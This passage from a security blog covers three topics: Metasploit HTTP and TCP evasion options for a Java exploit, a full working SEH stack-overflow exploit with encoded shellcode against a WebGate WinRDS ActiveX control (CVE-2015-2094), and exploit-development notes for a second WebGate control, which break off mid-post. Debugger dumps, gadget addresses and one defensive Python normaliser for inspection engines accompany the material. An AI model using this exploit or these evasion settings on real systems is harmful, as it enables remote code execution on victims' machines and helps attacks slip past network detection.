<span style="font-family: Courier New, Courier, monospace;">Module evasion options:</span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTML::base64</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: none</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable HTML obfuscation via an embeded base64 html object (IE </span><br />
<span style="font-family: Courier New, Courier, monospace;"> not supported) (accepted: none, plain, single_pad, double_pad, </span><br />
<span style="font-family: Courier New, Courier, monospace;"> random_space_injection)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTML::javascript::escape</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable HTML obfuscation via HTML escaping (number of iterations)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTML::unicode</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: none</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable HTTP obfuscation via unicode (accepted: none, utf-16le, </span><br />
<span style="font-family: Courier New, Courier, monospace;"> utf-16be, utf-16be-marker, utf-32le, utf-32be)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::chunked</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: false</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable chunking of HTTP responses via "Transfer-Encoding: </span><br />
<span style="font-family: Courier New, Courier, monospace;"> chunked"</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::compression</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: none</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable compression of HTTP responses via content encoding </span><br />
<span style="font-family: Courier New, Courier, monospace;"> (accepted: none, gzip, deflate)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::header_folding</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: false</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable folding of HTTP headers</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::junk_headers</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: false</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Enable insertion of random junk HTTP headers</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : HTTP::server_name</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: Apache</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Configures the Server header of all outgoing replies</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : TCP::max_send_size</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Maximum tcp segment size. (0 = disable)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Name : TCP::send_delay</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Current Setting: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Description : Delays inserted before every send. (0 = disable)</span><br />
msf exploit(java_jre17_reflection_types) ><br />
<br />
To select an evasion, execute a command of the form<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">msf exploit(java_jre17_reflection_types) > set evasion_name parameter</span><br />
e.g.<br />
<span style="color: #cc0000;">msf exploit(java_jre17_reflection_types) > set HTTP::compression gzip</span><br />
<span style="color: #cc0000;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhno_yikEswJayMl4q3tIQAm9oNHaMG7vDREGO9LDZFXl19YN-UYe3MI0A3JLqrWcj9hzxUgooCoJbLpkvqi2YsSsa89gW5vgMB34Gm1GHBlTQ0RnOFvbvV5kQJO-AGy3BrPBcQuy-1vVU4/s1600/reflection_set_evasion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhno_yikEswJayMl4q3tIQAm9oNHaMG7vDREGO9LDZFXl19YN-UYe3MI0A3JLqrWcj9hzxUgooCoJbLpkvqi2YsSsa89gW5vgMB34Gm1GHBlTQ0RnOFvbvV5kQJO-AGy3BrPBcQuy-1vVU4/s1600/reflection_set_evasion.png" height="176" width="400" /></a></div>
<br />
<b>base64</b><br />
Encodes the HTML page with base64; the payload is not delivered in this case.<br />
Base64 is a binary-to-text encoding scheme that represents binary data in an ASCII string format by translating it into a radix-64 representation.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAxpryHVc3_rFpN7TkRs4nrW20piPO0nnXh504rx3sygMe2PIfq9KxDDowZ4xHcAv8EJ3TnX5mkztyYChKbP-x4sAI7-BfFBYmbvizsoDTpZW0Qsq2Sl9-YkK-7uhgFAl8UdDVPDmM77Z/s1600/reflection_base64.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAxpryHVc3_rFpN7TkRs4nrW20piPO0nnXh504rx3sygMe2PIfq9KxDDowZ4xHcAv8EJ3TnX5mkztyYChKbP-x4sAI7-BfFBYmbvizsoDTpZW0Qsq2Sl9-YkK-7uhgFAl8UdDVPDmM77Z/s1600/reflection_base64.png" height="400" width="353" /></a></div>
<br />
<a href="http://www.hcidata.info/base64.htm">http://www.hcidata.info/base64.htm</a><br />
<br />
<b>javascript escape (iteration 1)</b><br />
Inserts an unescape() call into the HTML page.<br />
The escape() function encodes a string for portability, so it can be transmitted across networks and computers; the unescape() function decodes an encoded string.<br />
<br />
String Encoding: <span style="font-family: Courier New, Courier, monospace;">document.write(escape("Escape Function!"));</span><br />
Output of Above Code: Escape%20Function%21<br />
<br />
String Decoding: <span style="font-family: Courier New, Courier, monospace;">document.write(unescape("Escape%20Function%21"));</span><br />
Output of Above Code: Escape Function!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNfzWH0p0SLQZH1nB-WqmicLWUpdo6gKZc7jVLt88_aGJGU2tI19bgfKtmhO6icSir4gB2cyBIxVSKGq2OLFn4fElSz8j2jMs1w5VGiAtv8rJUazQdI-Otk4YjqWVzmXut13qcA5mEEM_/s1600/reflection_javascript_unescape.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNfzWH0p0SLQZH1nB-WqmicLWUpdo6gKZc7jVLt88_aGJGU2tI19bgfKtmhO6icSir4gB2cyBIxVSKGq2OLFn4fElSz8j2jMs1w5VGiAtv8rJUazQdI-Otk4YjqWVzmXut13qcA5mEEM_/s1600/reflection_javascript_unescape.png" height="253" width="400" /></a></div>
<br />
<br />
<b>unicode (utf16-be)</b><br />
Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSrn8F6xnD9OzCoZrNHAnE1YSlGS_RujxpeQFr0i3LKFEXkaLS4fCV2eYSkPJI5o0blSyYm7kq7q_j4pI5vnY0CsZwxgxNxoibVzxL0GP7YYUukBKrJXv4l1z3RE4oMEvnnQHKWRUUOxyt/s1600/reflection_unicode_utf16be.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSrn8F6xnD9OzCoZrNHAnE1YSlGS_RujxpeQFr0i3LKFEXkaLS4fCV2eYSkPJI5o0blSyYm7kq7q_j4pI5vnY0CsZwxgxNxoibVzxL0GP7YYUukBKrJXv4l1z3RE4oMEvnnQHKWRUUOxyt/s1600/reflection_unicode_utf16be.png" height="400" width="356" /></a></div>
For more info on Unicode<br />
<a href="http://unicode.org/standard/WhatIsUnicode.html">http://unicode.org/standard/WhatIsUnicode.html</a><br />
<br />
<b>chunked</b><br />
Instead of a "Content-Length" header, the HTTP response carries "Transfer-Encoding: chunked" and the body is sent in chunks, each preceded by its size.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyvAConj207YTXl20EhkopsMTXfdXxrIkjvKLvZqGgXvNirNMb2Eh89YvaEGufEzIxBY9RQ9WEHYgmefPGQppo2fkTzLWepcCvFsjnkg6is0YhxlsoP9G6M-U0gxesenybwdxvbvcIkXkQ/s1600/reflection_chunked_encoding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyvAConj207YTXl20EhkopsMTXfdXxrIkjvKLvZqGgXvNirNMb2Eh89YvaEGufEzIxBY9RQ9WEHYgmefPGQppo2fkTzLWepcCvFsjnkg6is0YhxlsoP9G6M-U0gxesenybwdxvbvcIkXkQ/s1600/reflection_chunked_encoding.png" height="258" width="400" /></a></div>
<br />
<br />
<b>compression (gzip)</b><br />
The process of reducing data size is known as “data compression”. GZIP performs best on text-based data such as CSS, JavaScript and HTML, and most browsers support GZIP compression. For GZIP compression intricacies, refer to this <a href="https://www.youtube.com/watch?v=whGwm0Lky2s&feature=youtu.be&t=14m11s">YouTube link</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhydCxnAuLm5PO1zo2ggUp7qetYt6Y3ynJOZFVLRJcihyphenhyphen-5hu5oWXqGHaab4CAVJjI6lSbTjJfTX8EO6wG7m4YEisxtEZhXBQI3_PpSzeZjOW13qtetdJwwJ5V6Lj5GUQzTn_mAmAreNTXz/s1600/reflection_compression_gzip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhydCxnAuLm5PO1zo2ggUp7qetYt6Y3ynJOZFVLRJcihyphenhyphen-5hu5oWXqGHaab4CAVJjI6lSbTjJfTX8EO6wG7m4YEisxtEZhXBQI3_PpSzeZjOW13qtetdJwwJ5V6Lj5GUQzTn_mAmAreNTXz/s1600/reflection_compression_gzip.png" height="357" width="400" /></a></div>
<br />
<br />
<b>Header Folding</b><br />
Splits header values across multiple lines, each continuation line beginning with a space (\x20) or horizontal tab (\x09).<br />
From RFC 2616:<br />
HTTP/1.1 header field values can be folded onto multiple lines if the continuation<br />
line begins with a space or horizontal tab. All linear white space, including folding,<br />
has the same semantics as SP. A recipient MAY replace any linear white space<br />
with a single SP before interpreting the field value or forwarding the message<br />
downstream.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTQABHfKNmh_YZezu5ZyxQ2yjoK6exFCbZk-aZoIJearfDrmhxAxNXuo1XFOiC4R11dzbOO5WH5KzTgSMknaTpnY9pu5Epu3p-BpGVKvufjnodIB3B1IYxWylUinxFB1F2ompVE2G7oyUc/s1600/reflection_header_folding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTQABHfKNmh_YZezu5ZyxQ2yjoK6exFCbZk-aZoIJearfDrmhxAxNXuo1XFOiC4R11dzbOO5WH5KzTgSMknaTpnY9pu5Epu3p-BpGVKvufjnodIB3B1IYxWylUinxFB1F2ompVE2G7oyUc/s1600/reflection_header_folding.png" height="400" width="386" /></a></div>
<br />
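The transport-level evasions above (chunked transfer, gzip/deflate compression, header folding and junk headers) only work against an inspection engine that matches signatures on the raw bytes. The Python below is an added example for this post, not Metasploit code; it normalises a response the way a detector must before matching, and the sample response it builds is constructed by hand with all three transformations applied.

```python
"""Normalise an HTTP/1.1 response before signature matching: unfold RFC 2616
continuation lines, reassemble a chunked body, and undo Content-Encoding.

Added example, not Metasploit's or the blog author's code. The sample
response in build_sample() is constructed for this demonstration.
"""
import gzip
import zlib


def unfold_headers(raw_headers: bytes) -> dict:
    """Join folded continuation lines (leading SP/HT) onto the previous header,
    as RFC 2616 allows, and return a lower-cased name -> value map.
    Lines without a ':' (junk) are ignored rather than breaking parsing."""
    joined = []
    for line in raw_headers.split(b"\r\n"):
        if line[:1] in (b" ", b"\t") and joined:
            # A recipient MAY replace any linear white space with a single SP.
            joined[-1] += b" " + line.strip()
        else:
            joined.append(line)
    headers = {}
    for line in joined:
        if b":" not in line:
            continue
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers


def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked body: '<hex size>[;ext]\\r\\n<data>\\r\\n' repeated,
    terminated by a zero-size chunk."""
    out = b""
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";", 1)[0], 16)
        pos = line_end + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the data and its trailing CRLF
    return out


def decompress(body: bytes, encoding: str) -> bytes:
    """Undo Content-Encoding. 'deflate' is sent as either a zlib-wrapped or a
    raw DEFLATE stream by different servers, so accept both."""
    if encoding == "gzip":
        return gzip.decompress(body)
    if encoding == "deflate":
        try:
            return zlib.decompress(body)
        except zlib.error:
            return zlib.decompress(body, -zlib.MAX_WBITS)
    return body


def normalize_response(raw: bytes) -> tuple:
    """Return (status line, headers dict, plain body) for a raw response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, _, header_block = head.partition(b"\r\n")
    headers = unfold_headers(header_block)
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = dechunk(body)
    body = decompress(body, headers.get("content-encoding", "").lower())
    return status_line.decode(), headers, body


def build_sample() -> bytes:
    """Constructed response: folded headers, a junk header, gzip body, chunked."""
    page = b"<html><applet code='Exploit.class'></applet></html>"
    compressed = gzip.compress(page)
    chunks = [compressed[:7], compressed[7:]]
    chunked = b"".join(b"%x\r\n%s\r\n" % (len(c), c) for c in chunks) + b"0\r\n\r\n"
    headers = (b"HTTP/1.1 200 OK\r\n"
               b"Server: Apache\r\n"
               b"Content-Type: text/html;\r\n\tcharset=utf-8\r\n"  # folded value
               b"Transfer-Encoding:\r\n chunked\r\n"               # folded value
               b"Content-Encoding: gzip\r\n"
               b"X-Junk: 7f3a\r\n\r\n")                           # junk header
    return headers + chunked
```

A rule that looks for the applet tag only fires if it runs over the body returned by normalize_response(), not over the wire bytes.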
<br />
<b>Junk Headers</b><br />
Insert invalid headers into the HTTP response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs-orORfSRAOVrKB9StOhJbWaNUMqRLBW_MdKJajyujOaPkhvtTN9WHVo1aQLsJEq0uY07J8c8UKMXS3NJ7wYMWV0rJQaeSTqeqko7JHoUPjkzyiWTCqitfpoy_oCE9d99CgLYsuPJu4wh/s1600/reflection_junk_headers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs-orORfSRAOVrKB9StOhJbWaNUMqRLBW_MdKJajyujOaPkhvtTN9WHVo1aQLsJEq0uY07J8c8UKMXS3NJ7wYMWV0rJQaeSTqeqko7JHoUPjkzyiWTCqitfpoy_oCE9d99CgLYsuPJu4wh/s1600/reflection_junk_headers.png" height="400" width="375" /></a></div>
<br />
<br />
<b>TCP max_send_size</b><br />
Metasploit doesn't send packets with a segment size of 8 bytes when max_send_size is set to 8. In the normal attack scenario we were sending 30 to 40 packets, but with this evasion type we send 80 packets.<br />
<br />
<b>TCP send_delay</b><br />
<div>
TCP delay: not sure whether the value passed is in microseconds or seconds; we don't see any delay between packets.<br />
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-9393313130407243282015-03-28T00:06:00.001+05:302015-03-28T00:20:03.903+05:30CVE-2015-2094: WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Remote Code Execution Vulnerability (0Day)During PoC testing, to check the stack alignment with the assignment below<br />
nseh = "DDDD";<br />
var seh = "EEEE";<br />
<br />
Process attachProcess attachProcess attach end(3eb4.39f8): Access violation - code c0000005 (first chance)<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
eax=00000e20 ebx=00000041 ecx=0329fc34 edx=00002711 esi=77c50041 edi=020bf1e0<br />
eip=77c1dcbf esp=020bf178 ebp=020bf1a0 iopl=0 nv up ei ng nz ac pe cy<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210297<br />
msvcrt!__wcstombs_mt+0x56:<br />
77c1dcbf 881c07 mov byte ptr [edi+eax],bl ds:0023:020c0000=4d<br />
0:008> !exchain<br />
<b>020bf260</b>: <b><span style="color: #38761d;">45454545</span></b><br />
Invalid exception stack at <span style="color: #cc0000;"><b>44444444</b></span><br />
0:008> d 020bf260<br />
<b>020bf260 <span style="color: #cc0000;">44 44 44 44</span></b> <b><span style="color: #38761d;">45 45 45 45</span></b>-90 90 90 90 90 90 90 90 DDDDEEEE........<br />
020bf270 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf280 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf290 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf2a0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
020bf2b0 90 90 90 90 90 90 90 90-41 41 41 41 41 41 41 41 ........AAAAAAAA<br />
020bf2c0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />
020bf2d0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />
0:008> d fs:[0]<br />
003b:00000000 <b>60 f2 0b 02</b> 00 00 0c 02-00 00 0b 02 00 00 00 00 `...............<br />
003b:00000010 00 1e 00 00 00 00 00 00-00 60 fd 7f 00 00 00 00 .........`......<br />
003b:00000020 b4 3e 00 00 f8 39 00 00-00 00 00 00 00 00 00 00 .>...9..........<br />
003b:00000030 00 80 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000040 f0 3c 24 e1 00 00 00 00-00 00 00 00 00 00 00 00 .<$.............<br />
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Module info :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0x00870000 | 0x00ffa000 | 0x0078a000 | True | True | False | False | True | 6.0.1 [IPPDecoder.dll] (C:\WINDOWS\system32\WESPSDK\IPPDecoder.dll)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0x10000000 | 0x100e0000 | 0x000e0000 | False | False | False | False | True | 1.6.42.0 [WESPPlayback.dll]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0x1007f29e : pop ebx # retn # pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPPlayback.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll)</span><br />
<br />
Final Exploit<br />
<br />
<pre class="prettyprint"><html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'>
</object>
<script>
var buff1 = "";
var nops = "";
var buff2 = "";
for (i=0;i<128; i++)
{
buff1 += "B";
}
nseh = "\xeb\x08PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);
</script>
</html>
</pre>
<br />
Refer to the link below for another WebGate exploit<br />
<a href="http://blog.disects.com/2015/03/webgate-edvr-manager.html">http://blog.disects.com/2015/03/webgate-edvr-manager.html</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-35190201335139174892015-03-25T23:51:00.000+05:302015-04-07T23:44:00.713+05:30WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (CVE-2015-2097)<br />
WEBGATE Embedded Standard Protocol (WESP) SDK has multiple Remote Code Execution Vulnerabilities in different ActiveX controls.<br />
<br />
Use the mona command below to find a pop pop ret address; it creates findwild.txt in C:\Program Files\Immunity Inc\Immunity Debugger<br />
<span style="color: #cc0000;">!mona findwild -s "pop r32#*#pop r32#*#ret"</span><br />
<br />
Snippet of findwild.txt (addresses which I tried to use)<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x10079740 </b>: pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x100580bd </b>: pop ebp # pop ebx # mov dword ptr fs:[0],ecx # add esp,34 # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x1007973e </b>: pop ebx # retn # pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x1001a561 </b>: pop ebp # mov byte ptr ds:[edx+c],1 # mov al,1 # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x10014771 </b>: pop ebx # pop ebp # retn | ascii {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\<b>WESPMonitor.dll</b>)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x7c915242 </b>: pop edi # pop esi # pop ebx # pop ebp # retn | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\<b>ntdll.dll</b>)</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
I was trying to reuse calc.exe shellcode from previous exploits, which somehow didn't work (assuming it might be due to the presence of bad characters), so I ended up generating the payload using Metasploit.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWo7i5c160P0F3t0nB2v6Ans3Kh54PjUCs6LWLD5hYjKUKvFdH6xtAifMqE6PJgx_ATDFtKu-ugDB2XOlHJT7mqPPUqkd8rd94kvQLUHUPBE1JzovGImpYdmZv4Q7LO8lBK79ZTZXV64wW/s1600/shellcode_generation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWo7i5c160P0F3t0nB2v6Ans3Kh54PjUCs6LWLD5hYjKUKvFdH6xtAifMqE6PJgx_ATDFtKu-ugDB2XOlHJT7mqPPUqkd8rd94kvQLUHUPBE1JzovGImpYdmZv4Q7LO8lBK79ZTZXV64wW/s1600/shellcode_generation.png" height="400" width="320" /></a></div>
<br />
To make sure we are pointing to the shellcode, modify <span style="font-family: Courier New, Courier, monospace;">nseh = "\xeb\x10\x90\x90"</span><br />
to <span style="font-family: Courier New, Courier, monospace;">nseh = "\xcc\xcc\xeb\x10";</span><br />
where \xcc is an opcode which acts as a breakpoint.<br />
<br />
The following "pop pop ret" addresses always get modified to a different address, and WinDBG shows the error below.<br />
<span style="font-family: 'Courier New', Courier, monospace;">0013df5c: WESPMonitor!CxImage::`copy constructor closure'+13d20 (10073f40)</span><br />
<br />
